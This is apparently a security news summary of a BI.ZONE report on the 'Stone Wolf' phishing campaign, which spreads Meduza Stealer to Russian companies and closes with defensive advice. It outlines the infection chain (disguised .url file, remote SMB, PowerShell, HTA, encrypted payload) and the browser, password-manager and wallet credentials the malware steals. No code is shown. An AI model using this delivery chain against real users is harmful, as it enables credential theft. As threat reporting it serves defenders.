Meduza Stealer Targets Russian Companies via Phishing Campaigns

Introduction

On August 2024, BI.ZONE released a detailed report revealing increased phishing attacks leveraging the Meduza Stealer malware to target Russian organizations. The attackers, identified as part of a threat cluster known as "Stone Wolf," exploited the reputation of legitimate industrial automation companies to trick users into downloading malicious payloads.

Report Overview

Stone Wolf's malicious campaign began by disseminating phishing emails that looked legitimate communication from well-known industrial automation providers. These emails contained an archive named "Dostavka_Promautomatic.zip," which, when opened, revealed a combination of legitimate and malicious files, including a digital signature (.p7s file) and a decoy document (.docx). Alongside these was a malicious URL file, "Scan_127-05_24_dostavka_13.05.2024.pdf.url," which led to the deployment of the Meduza Stealer malware.

Phishing attacks relying on recognizable brands and logos remain highly effective. These visual cues establish trust with unsuspecting users, making them more likely to engage with malicious content. Stone Wolf's use of industrial providers as the cover for their attacks capitalizes on this vulnerability.

Once the malicious link is accessed, the attack loads a file from a remote SMB server. A Windows shortcut file triggers a command involving PowerShell:

This command downloads and executes an HTA file, which, in turn, executes an AES-encrypted payload through PowerShell. The payload downloads additional malware components from the same remote network, ultimately leading to Meduza Stealer's installation.

Meduza Stealer is a commercial malware-as-a-service tool that first surfaced on underground forums in June 2023. Available for purchase through subscription models, it offers cybercriminals access to a web panel that tracks the data collected from infected systems, despite claims that Meduza Stealer's executable contains an anti-CIS module designed to avoid Russian targets, BI. ZONE's sample of the malware demonstrated no such restrictions.

Upon successful execution, Meduza Stealer collects a wide array of information, including:

• Operating system details
• IP address and screen snapshots
• Credentials from browsers (e.g., Chrome, Edge, Yandex)
• Password manager data (e.g., 1Password, NordPass)
• Cryptographic wallet credentials
• Windows Credential Manager and Windows Vault data

The malware also retrieves session data from communication tools like Telegram and Discord, along with Steam tokens. This collected data is transmitted to a command and control (C2) server for the attacker's use.

Insights and Analysis

BI. ZONE's report stresses the importance of user awareness and regular cybersecurity training to combat phishing attempts. The following preventative measures are recommended:

• Regularly train employees to recognize phishing techniques, especially those using trusted brands to establish credibility.
• Implement robust email filtering systems to block malicious attachments and links.
• Utilize endpoint detection and response (EDR) solutions with specific rules to detect abnormal MSHTA or PowerShell activities.

By leveraging trusted brands and delivering highly potent malware like Meduza Stealer, attackers continue to pose significant threats to organizations globally. Regularly updating detection systems and maintaining awareness of phishing techniques is crucial to minimizing the risks associated with such attacks.

Indicators of Compromise (IOCs)

MITRE ATT&CK Techniques

References

Stone Wolf employs Meduza Stealer to hack Russian companies

A new cluster of activity abuses a legitimate brand to spearphish for credentials and system data

MediumWritten by BI.ZONE